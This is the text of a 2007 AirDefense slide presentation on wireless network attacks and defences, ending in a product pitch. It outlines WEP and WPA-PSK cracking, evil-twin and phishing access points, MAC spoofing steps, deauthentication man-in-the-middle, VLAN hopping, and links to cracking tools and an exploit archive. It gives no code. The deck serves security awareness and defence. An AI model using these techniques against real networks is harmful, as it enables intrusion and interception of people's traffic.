War of the Airwaves Wireless Hacks & Defenses Richard Rushing Chief Security Officer AirDefense, Inc. rrushing@airdefense.net www.airdefense.net Get Ready for the Untethered World! Copyright © 2002-2007 AirDefense Proprietary and Confidential. 2 Wired Network Security Architecture Attackers SECURE ENTERPRISE PERIMETER Server INTERNET INTRANET Virus & Malware Desktop Inside Threat Data Theft Copyright © 2002-2007 AirDefense Proprietary and Confidential. 3 Wireless Threats Enterprise Networks Everyone is on the Inside 6 Wi-Fi Phishing Muni Wi-Fi AP 1 Rogue AP Connected to Network Evil Twin Hacker 2 Leaked Wired Traffic & Insertion Server Mobile User AP INTERNET INTRANET Laptop Desktop 3 Non-Compliant AP Municipal Wi-Fi aggravates Threats to Enterprise Networks 5 Users Bypassing Network 4 Neighboring AP Security Controls Municipal Wi-Fi Copyright © 2002-2007 AirDefense Proprietary and Confidential. 4 Characteristics of Wireless Networks 1 Vs. AIR Shared, Uncontrolled Media Invisible & Airborne Threats are hard to control vs. Wired Network Self-Deploying & Transient Networks 2 Simplicity of Self Discovery Create Security Challenges Mobile Nature of Wireless LAN Devices and Users Require In-depth Forensics capability to Address Security Breaches User Indifference 3 4 Invisible Connectivity & True Distributed Nature Gives a Faulty Sense of Security Easier to Attack Lax WLAN Security is the Lowest Hanging Fruit for Hackers. Dozens of Tools Readily Available to Exploit these Holes Wireless Networks Pose Higher Risks than Wired Networks Copyright © 2002-2007 AirDefense Proprietary and Confidential. 5 Damage Attack Sophistication Anti Virus Content Filtering SSL VPN Firewalls Secure Perimeter Copyright © 2002-2007 AirDefense Proprietary and Confidential. AirDefense Wired Networks Wired Security Tools Layered Approach to Security Wireless Networks Increased Vulnerability For Upper Layers Predominant Attacks 6 Wireless Attack Surface Signal emitted from a single access point. Copyright © 2002-2007 AirDefense Proprietary and Confidential. 7 Just a Little Wigle Over 11 Million Networks... With GPS… I know all your secrets! Copyright © 2002-2007 AirDefense Proprietary and Confidential. 8 Security is Never ABOUT Just Good Enough Security is Never ABOUT JUST GOOD ENOUGH Run your firewall for 6 minutes a day Turn off your IDS Allow All Traffic through your firewall Leave Doors unlock Leave Keys in the Car Copyright © 2002-2007 AirDefense Proprietary and Confidential. 9 Wireless Data Breaches in Retail Copyright © 2002-2007 AirDefense Proprietary and Confidential. 10 Agenda Introduction to Wireless Security Wireless Risks & Attacks Attacking the RF Medium Passive Listening Wired Network Leakage Injection Jamming Breaking WEP Best Practices for Wireless Security The AirDefense Solution Q&A Copyright © 2002-2007 AirDefense Proprietary and Confidential. 11 Wireless Sniffing Why & What Happens Any clear-text is heard by everyone If you are using WEP, remember everyone has YOUR key Very common at hotspots Hashes are clear-text Most Service, still authenticate over clear-text no tunnels Internal/Corporate servers are at higher risk due to lower security Copyright © 2002-2007 AirDefense Proprietary and Confidential. 12 It’s Encrypted Is it really encrypted?? In some APs, “Both” is typical security No to show that data is encrypted The #1 AP Vendor Enable WEP, MIC, and TKIP Set the WEP level and enable TKIP and MIC “ If you enter optional, client devices can associate to the access point with or without WEP enabled. You can enable TKIP with WEP set to optional but you cannot enable MIC. If you enter mandatory, client devices must have WEP enabled to associate to the access point. You can enable both TKIP and MIC with WEP set to mandatory.” www.cisco.com Copyright © 2002-2007 AirDefense Proprietary and Confidential. 13 WEP Summary of Attacks 23 Known Attacks against WEP WEP Attacks Lack of IV replay protection Short IV sequence space RC4 vulnerabilities due to WEP’s implementation Linear properties of CRC32 (allows bit flipping) Lack of keyed Message Integrity Checking MIC Use of shared keys Shows that Implementation is VERY IMPORTANT Breaking Wep 2001 Un-crackable 2003 Years 2004 Days 2005 Hours 2006 Minute 2007 Seconds Ultimate Hacking tool for Wep http://www.aircrack-ng.org/ Copyright © 2002-2007 AirDefense Proprietary and Confidential. 14 WPA-PSK The PSK version of WPA suffers from an offline dictionary attack because of the BROADCASTING of information required to create and verify a session key. In WPA, the PMK (master key) is produced by running a special function on a preshared pass phrase and an SSID. Both the host and the AP use this PMK, along with MAC addresses and nonces, in order to create the PTK (session key) Client PMK Access Point PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256) Snonce PMK Anonce EAPOL-Key (Anonce) PTK EAPOL-Key (Snonce, MIC RSN IE) PTK = PRF-512(PMK, “Pairwise key expansion”, Min(AP_Mac, Client_Mac) || Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce)) PTK EAPOL-Key (Anonce, MIC RSN IE) Install Keys EAPOL-Key (Snonce, MIC) Copyright © 2002-2007 AirDefense Proprietary and Confidential. Install Keys 15 WPA Tools (Easier than WEP) http://sourceforge.net/projects/ptcrack/ A hybrid dictionary/brute passphrase search tool for PMK discovery on 802.11 networks using WPA with preshared keys (PSKs) http://www.churchofwifi.org coWPAtty 3.0 is designed to audit the security of pre-shared keys selected in WiFi Protected Access (WPA) networks (http://www.churchofwifi.org) Rainbow-Like Tables http://umbra.shmoo.com:6969/torrents/wpa_psk-h1kari_renderman.torrent http://umbra.shmoo.com:6969/torrents/wpa_psk-h1kari_renderman.torrent The resulting list is ~1,000,000 words for a total of approximately 40GB of hash tables for the top 1000 SSID's AirCrack-NG 2006 80 keys per second Built in WPA cracker since version 2.3 http://www.aircrack-ng.org/ http://www.tinypeap.com/page8.html 2007 130 keys per second 2007 30,000 keys per second WPA Cracker is a brute force Password cracker, all information entered manually. Rogue Squadron WRT firmware http://airsnarf.shmoo.com/rogue_squadron/index.html If you use 21 Character Pass-Phase you are safe? How many clients and AP’s let you enter in 31 Characters? What Happens when you Reach and overlap with SSID? Copyright © 2002-2007 AirDefense Proprietary and Confidential. 16 What in the Air can Kill You? #1 Corporate Vulnerability Even if the data is encrypted, the services that are run by the MAC address can be detected Remember wireless is LAYER 2; it will send out all Layer 2 traffic VRRP, HSRP, Spanning Tree, OSPF, VTP/VLAN, CDP VLAN don’t help unless filtered MOST USE HASHES or PASSWORDS Clear-Text Broadcast/Multicast key rotation is OFF by Default Client devices using static WEP cannot use the access point when you enable broadcast key rotation It’s a two-way street, what goes out can also come in! Copyright © 2002-2007 AirDefense Proprietary and Confidential. 17 Injection of Traffic Yersinia is a network tool designed to take advantage of some weaknesses in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. http://www.yersinia.net Attacks Spanning Tree Protocol (STP) Cisco Discovery Protocol (CDP) Dynamic Trunking Protocol (DTP) Dynamic Host Configuration Protocol (DHCP) Hot Standby Router Protocol (HSRP) 802.1q 802.1x Inter-Switch Link Protocol (ISL) VLAN Trunking Protocol (VTP) Current Exploits Cisco CatOS VLAN Trunking Protocol Remote Command Execution Vulnerability Cisco IOS Multiple VLAN Trunking Protocol Code Execution and DoS Vulnerabilities Cisco Intrusion Prevention and Detection Systems DoS and Security Cisco Access Point Web-browser Interface Unauthorized Administrative Access and Bypass Issue Copyright © 2002-2007 AirDefense Proprietary and Confidential. 18 Agenda Introduction to Wireless Security Wireless Risks & Attacks Attacking Clients Wireless Fuzzing Mobile Workers Windows Zero-Configuration Hotspots Station Impersonation Bridging Interfaces Wireless Printers Best Practices for Wireless Security The AirDefense Solution Q&A Copyright © 2002-2007 AirDefense Proprietary and Confidential. 19 Clients All Shapes and Sizes Hotspots Wi-Fi Phones Free Access via OUI Many ways to attack clients Scan Exploit Repeat But why do you have to? Have the client come to you! YOU KNOW WHAT THEY WANT!!!!!!! Probe Request Soft AP to the Probe Request Copyright © 2002-2007 AirDefense Proprietary and Confidential. 20 Attacking Wireless Clients Packets of Death Plenty of them from handheld devices to laptops Most are BAD packets Usually Management or Control Frames Some are Data WEP Cracking is adding to the packets Fuzzing Most are using cut through data rates (5.5 for Beacon Frames) Most are simple buffer overflows Lots of things that go BOOM Client Software Authentication Supplicates http://www.802.11mercenary.net/lorcon/ Copyright © 2002-2007 AirDefense Proprietary and Confidential. 21 Client MAC Address Spoofing 1. Find MAC address MAC: 00 02 2D 50 D1 4E (Cisco 350) 2. Change MAC (SMAC, regedit) User Station 3. Re-initialize card 4. Associate AP 1 2 NEW MAC: 00 02 2D 50 D1 4E ORIGINAL MAC: 00 12 2D 50 43 1E (Orinoco Gold) 3 4 Hacker www.klcconsulting.net/smac SMAC is a MAC Address Modifying Utility (spoofer) for Windows 2000/XP and Server 2003 systems, regardless of whether the manufactures allow this option or not. MAC filtering is not enough Copyright © 2002-2007 AirDefense Proprietary and Confidential. 22 How Not to Attack a Client CORPORATE NETWORK 1 Laptop sends Probe request AP responds to Probe request 3 User Station Naïve user Associates with AP AP provides IP address to user 5 2 Wired Thinking Attack 4 Scan laptop for Windows vulnerabilities & compromise it Intruder Laptop as Soft AP 6 Use User Station as a launch pad Municipal Wi-Fi increases Evil Twin attack surface Copyright © 2002-2007 AirDefense Proprietary and Confidential. 23 Windows Wireless Zero Configuration 1. Wireless Auto Configuration attempts to connect to the preferred networks that appear in the list of available networks in the preferred networks preference order 2. If there are no successful connections, Wireless Auto Configuration attempts to connect to the preferred networks that are hidden wireless network. (No Beacon SSID) Copyright © 2002-2007 AirDefense Proprietary and Confidential. 24 Windows Wireless Zero Configuration 3. If there are no successful connections and there is an ad hoc network in the list of preferred networks that is available, Wireless Auto Configuration tries to connect to it Copyright © 2002-2007 AirDefense Proprietary and Confidential. 25 Windows Wireless Zero Configuration If there are no successful connections Wireless Auto Configuration configures the wireless network adapter to act as the first node in the ad hoc network If there are no successful connections to preferred networks and there are no ad hoc networks in the list of preferred networks, If Automatically connect to non-preferred networks is enabled, If all connection attempts to non-preferred networks fail, Wireless Auto Configuration creates a random wireless network name and places the wireless network adapter in infrastructure mode. If the Windows wireless client is already connected to a wireless network but a more preferred wireless network becomes available, Wireless Auto Configuration disconnects from the currently connected wireless network and attempts to connect to the more preferred wireless network Copyright © 2002-2007 AirDefense Proprietary and Confidential. 26 Wireless Phishing Tools such as Karma can respond to ANY client probe request Variety of services (POP, FTP and HTTP) to lure unsuspecting users No authentication of “pervasive wireless cloud” Automatic network selection in Windows (Zero Configuration Client) and MACs is dangerous Enterprises need to manage centralized policies Karma (http://theta44.org/karma/index.html) AirSnarf (http://airsnarf.shmoo.com/) Copyright © 2002-2007 AirDefense Proprietary and Confidential. 27 DHCP and DNS Clients Attacks Since they Take the Hook, now asking for More Hungry Fish Give Me an IP Address Give them an address the could be Excluded from Personal Firewalls 10.X.X.X, 192.168.X.X, 172.16.X.X Or an IP address they are looking for DHCP Attack Exploit attacks a client and loads creates a Admin User on device DHCP Broadcast Attack (MS06-036) http://www.milw0rm.com/sploits/07212006-MS06_036_DHCP_Client.tar.gz DNS Attack/Manipulation “I am DNS, I am the Internet” - Cricket Liu Can offer anything to you and you believe it Sites : Banking, Hotel, Airlines, Work (Exchange, Oracle, SQL) Copyright © 2002-2007 AirDefense Proprietary and Confidential. 28 Data Seepage Your notebook is not location-aware Office or Home or Hotspot Interfaces are Active by order Last Interface is usually Wifi Wants to always connect to something Just someone to offer you a connection Office All data is same Company Name What am I connected to? Servers Home Email Clients Applications And More….. Hotspot Copyright © 2002-2007 AirDefense Proprietary and Confidential. 29 Agenda Introduction to Wireless Security Wireless Risks & Attacks Real-World Wireless Issues Zero-Day Attacks Hotspots Best Practices for Wireless Security The AirDefense Solution Q&A Copyright © 2002-2007 AirDefense Proprietary and Confidential. 30 Exploiting is too Easy! Vx.netlux.org MVBSWE Worm Editors Virus Editors Script Editors Do you Trust your Hotspot Web Page? Corporate Guest Access? Copyright © 2002-2007 AirDefense Proprietary and Confidential. 31 Zero Day Alerts http://www.frsirt.com/ http://www.cert.org http://nvd.nist.gov FrSIRT delivers vulnerability and threat alerts, 24/7, 365 days a year, to inform organizations of new potential threats. Our services are designed to deliver notification of vulnerabilities and exploits as they are identified, providing timely, actionable information and guidance to help mitigate risks before they are exploited. Copyright © 2002-2007 AirDefense Proprietary and Confidential. 32 ZERO Day New Attacks Zero-Day attacks against know services Zero-Day attacks against IE, Firefox Remote Exploits I am on your system as YOU! New Trojans and Virus ready for Injection Favorite exploits NEW WMF Media Player Java Exploits www.milw0rm.com Copyright © 2002-2007 AirDefense Proprietary and Confidential. 33 Adding to Metasploit Framework Wireless Enabled Driver Level Exploit Point and Click Exploits Exploit for Zero-Day Attacks Numerous Payloads Number ways to take over you Computer Copyright © 2002-2007 AirDefense Proprietary and Confidential. 34 Agenda Introduction to Wireless Security Wireless Risks & Attacks Enumeration of Wireless Devices Password Sniffing & Cracking Hacking Password Hashes Breaking VPNs over Wireless Listening to VoIP Conversations One-way Insertion Attacks Zero-day Attacks Snarfing Best Practices for Wireless Security The AirDefense Solution Q&A Copyright © 2002-2007 AirDefense Proprietary and Confidential. 35 Hacking Password Hashes Get virtually any password Offline & passive LEAP, PPTP, MS-CHAPv2, MD-5 Search hash list to find password Large password list to generate hashes Requires 3-5 GB of space Rainbow tables are indexed hash lists Required 2-3 TB of space Known tables exist for up to14 characters http://rainbowtables.shmoo.com/ http://www.antsight.com/zsl/rainbowcrack/ http://www.rainbowcrack-online.com/ Copyright © 2002-2007 AirDefense Proprietary and Confidential. 36 Man-in-the-Middle Attack: WLAN Jack & Air-Jack Tools Allows attacker to: Intercept ALL communications between the client & AP Pretend to be the client without disrupting the client’s session at Layer 2 Possible due to: Management frame’s lack of authentication/ Lack of AP authentication Step 1: Disassociation of Target station from AP by spoofing the MAC of the AP and sending Disassociate & Deauth Frames Step 2: Attacker re-associates target to Malicious station and connects to AP AP Server Target Dual-Card Attacker Copyright © 2002-2007 AirDefense Proprietary and Confidential. 37 Snarfing Hot Spots Security question: Connecting to a untrusted network and launching the most vulnerable program you have just screams “ E X P L O I T M E “!!!! Fake web pages Steals your Hotspot Password Evil web pages Infect your PC with Malware My Web pages Steal your NT Password 1x1 pixel Cross Site Scripting Installs Trojans Installs Spyware Opens back doors Changes Registry Adds User Account Shares Files and such Oops you just opened a web page, that’s all!!!!! Copyright © 2002-2007 AirDefense Proprietary and Confidential. 38 Next Generation Wireless Attacks 802.1x State Machine Client initiated disconnection Assumes everyone plays nice Fuzzing Attacks will Expand Intel driver issues 802.1x supplicant issues AP issues Exploit More EAP-Types Windows Vista Wireless stack rewritten Good news Support for many EAP types Providing for XP too Bad news Hacking tools ported to Windows Built in Network Address Spoofing Point and click “hacking” TLS is not secure in Windows Copyright © 2002-2007 AirDefense Proprietary and Confidential. 39 Firewall Myths “Firewall only” approach to network security Firewalls: Cannot stop rogue wireless devices Do not eliminate the need for wireless scanning for rogues Do not protect against wireless attacks Once a hacker is on the network they can punch through open ports Access Control Lists are weaker than Firewalls Best bet is to keep hackers off the network Copyright © 2002-2007 AirDefense Proprietary and Confidential. 40 VPN Myths Allows the hacker to get onto open Wi-Fi network and exploit network or clients for weaknesses VPN WIPS Client cannot run on many embedded devices (e.g., wireless scanners, VoWi-Fi handsets, etc.) Subnet roaming is problematic VPN Less performance and more overhead Break weak encryption & authentication Re-authentication on weak ciphers Dictionary attacks on weak ciphers Protocol & server flaws exposed IKE Aggressive mode Pre-shared keys Exploiting bugs in VPN server Wireless Security A Layer 3 solution to a Layer 2 problem Copyright © 2002-2007 AirDefense Proprietary and Confidential. 41 VLANs Virtual Local Area Networks A logical grouping of devices or users Users can be grouped by function, department, application, regardless of physical segment location VLAN configuration is done at the switch (Layer 2) WIRELESS is not the SAME (Spoofing is EASY) VLAN Membership Static VLAN Assignment Port based membership: Membership is determined by the port on the switch on not by the host. Dynamic VLAN Assignment Membership is determined by the host’s MAC address. Administrator has to create a database with MAC addresses and VLAN mappings Copyright © 2002-2007 AirDefense Proprietary and Confidential. 42 Guest networking Issues on VLANs Guest access to Internet via WLAN IP-Adress for WLAN- Client via DHCP Server which is in the area of the Corporate Network, including DNS Servercredentials Sometimes a split but that does not help either…. As the DNS Server, still is in the Corporate LAN… Issues: DHCP DoS Access Point DNS DoS VLAN Hopping u.a. = 1q VLAN used for Guest “tunnelt” = DHCP Address supplied containing DNS Server Information = DNS request from Client Copyright © 2002-2007 AirDefense Proprietary and Confidential. Internet DNS Server DHCP Server WLAN SSID Guest VLAN Hopping Basic VLAN Hopping Attack Attacker fools switch into thinking that he is a switch that needs trunking Double Encapsulated VLAN Hopping Attack SSID’s Switches perform only one level of IEEE 802.1q decapsulation Corp Guest OLD VOIP This allows the attacker to specify Corp a .1q tag inside the frame, allowing the frame to go to a Client VLAN that the outer tag did specify VOIP OLD ? Guest WPA-2 Guest WEP Only Copyright © 2002-2007 AirDefense Proprietary and Confidential. 44 Why VLAN do not Work for Wireless Making Logical on a Physical Media Not Making Logical on a Virtual media Design on Port usage No Physical Ports on Wireless Copyright © 2002-2007 AirDefense Proprietary and Confidential. 45 Agenda Introduction to Wireless Security Wireless Risks & Attacks Best Practices for Wireless Security The AirDefense Solution Q&A Copyright © 2002-2007 AirDefense Proprietary and Confidential. 46 Recommended Wireless Security Strategy Automatically keep all unauthorized wireless devices off the entire wired network all the time Accurately detect (WIDS) and automatically defend (WIPS) against the greatest number of wireless attacks possible Contain and control authorized wireless devices, both inside owned facilities and outside at hotspots, municipal wifi zones & home Continually assure strong security configurations and policies 24x7 on all authorized wireless devices Store and data mine long-term, forensics quality information for investigations and diagnosing wireless problems Measure and prove compliance with regulatory wireless security policies and controls Copyright © 2002-2007 AirDefense Proprietary and Confidential. 47 Wireless Security Can not Mitigate Risks Flawed It’s the Internet All over Telnet FTP HTTP We still use them Risk vs. Threats SHARED MEDIUM Easy comprise Remediation is Key Monitoring is Key Copyright © 2002-2007 AirDefense Proprietary and Confidential. 48 Summary Wireless is a business enabler and part of every network Unmonitored wireless networks make the entire network infrastructure vulnerable Lack of policy compliance can result in regulatory liabilities AirDefense offers market-leading solutions to provide visibility and control of all wireless assets, regardless of location AirDefense solutions are trusted by the most securitysensitive organizations in the world AirDefense solutions are cost-effective & provide the lowest TCO Copyright © 2002-2007 AirDefense Proprietary and Confidential. 49 Contact us Web: www.AirDefense.NET HQs Phone: 770-663-8115 Demo of Laptop Products Available on www.AirDefense.NET Contact: Anthony Perridge Vice President, International aperridge@airdefense.net +44 1628 509058 http://www.airdefense.net/seminars/airdefense_europe_oct_2007.pdf Copyright © 2002-2007 AirDefense Proprietary and Confidential. 50 Summary Copyright © 2002-2007 AirDefense Proprietary and Confidential. 51